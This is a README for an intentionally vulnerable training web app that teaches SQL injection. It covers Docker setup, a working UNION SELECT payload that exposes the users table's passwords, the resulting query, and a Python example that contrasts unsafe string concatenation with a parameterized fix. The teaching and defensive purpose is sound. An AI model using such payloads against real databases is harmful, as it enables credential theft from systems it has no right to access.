SQLi Platform

This is a vulnerable web application built to teach the basics of SQL injection.

The front end exposes a field that lets the user search a database and retrieve names, nicknames, email addresses and so on. User input is not sanitized, which allows an attacker to inject SQL code and leak passwords.

SQL queries are logged on the backend and are also shown on the front end, so that the attacker has a better understanding of what they are doing.

Screenshot

Deploy

You may run the application under Docker containers:

docker-compose up

You may edit docker-compose.yml to tweak the following settings:

  • MYSQL_ROOT_PASSWORD Database password
  • SQL_HOST Database host, from the API's point of view
  • SQL_WAIT Time (in seconds) the API waits before connecting to the database

The application is then accessible on http://localhost:8080/.

Exploit

⚠️ Contains spoilers!
Here is an example of a working payload, exposing all passwords in the table:

nothing%" UNION SELECT pass, nickname, email FROM users#

Resulting in the following complete query:

SELECT id, nickname, email FROM users WHERE nickname LIKE "%nothing%" UNION SELECT pass, nickname, email FROM users#%"
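The fix for the query above, as an added example that is not part of this project's code: the first function shows the assumed string-concatenation pattern that produces the complete query, and the second binds the search term as a parameter and escapes LIKE wildcards. It assumes Python with an in-memory sqlite3 table standing in for the MySQL backend; all function names and sample rows are hypothetical.

```python
import sqlite3

# Payload quoted from the page, used here only as test input.
PAYLOAD = 'nothing%" UNION SELECT pass, nickname, email FROM users#'

def build_vulnerable_query(term):
    """Assumed shape of the unsafe code path: input concatenated into SQL."""
    return ('SELECT id, nickname, email FROM users '
            'WHERE nickname LIKE "%' + term + '%"')

def escape_like(term):
    """Escape LIKE metacharacters so input cannot act as a wildcard."""
    return (term.replace("\\", "\\\\")
                .replace("%", "\\%")
                .replace("_", "\\_"))

def search_safe(conn, term):
    """Hardened search: the term is bound as data, never parsed as SQL."""
    sql = ("SELECT id, nickname, email FROM users "
           "WHERE nickname LIKE ? ESCAPE '\\'")
    return conn.execute(sql, ("%" + escape_like(term) + "%",)).fetchall()

def make_db():
    """In-memory table with constructed sample rows (not the project's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "nickname TEXT, email TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users (nickname, email, pass) VALUES (?, ?, ?)",
        [("alice", "alice@example.test", "constructed-secret-1"),
         ("bob", "bob@example.test", "constructed-secret-2")])
    return conn

if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query(PAYLOAD))  # string the unsafe path would run
    print(search_safe(conn, "ali"))         # normal search still works
    print(search_safe(conn, PAYLOAD))       # payload matches nothing
    print(search_safe(conn, "%"))           # wildcard is matched literally
```

With the bound parameter the payload is compared against nicknames as plain text, so the UNION never reaches the SQL parser and the pass column is never selected.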

About

Training for SQL injections
